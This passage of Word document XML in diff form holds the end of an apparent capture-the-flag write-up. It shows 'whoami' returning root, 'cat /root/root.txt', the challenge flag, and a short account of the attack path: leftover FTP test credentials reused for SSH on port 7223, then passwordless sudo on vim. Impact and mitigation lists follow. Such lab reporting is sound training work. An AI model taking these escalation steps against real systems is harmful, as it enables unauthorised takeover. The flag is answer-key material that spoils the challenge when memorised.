+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>root</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67BB5B8B" wp14:editId="19B3D2EB">
+            <wp:extent cx="5647619" cy="2780952"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="1249974868" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1249974868" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5647619" cy="2780952"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Root Flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Retrieved:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>cat /root/root.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Flag:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>ThunderCipher{misconfigurations_dont_get_exploited_people_do}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332CE7C3" wp14:editId="5CC3EF4B">
+            <wp:extent cx="4923809" cy="1990476"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="654038965" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="654038965" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4923809" cy="1990476"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Vulnerability Explanation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Weak Credentials</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Test credentials were left active in FTP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Credential Reuse</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Same credentials worked for SSH service.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Hidden Service (Security by Obscurity)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>SSH was running on non-standard port 7223.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sudo Misconfiguration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>User allowed to run /usr/bin/vim as root without password.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>This falls under:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Broken Access Control</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>OWASP Top 10 – A01</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Impact</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Full system compromise</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• User data exposure</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Root-level access achieved</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Misconfiguration allowed total takeover</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Mitigation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Disable anonymous FTP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Enforce strong password policies</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Avoid credential reuse</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Remove unnecessary sudo privileges</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Do not allow editors like vim in sudo without restriction</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>• Restrict SSH to standard port with firewall rules</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
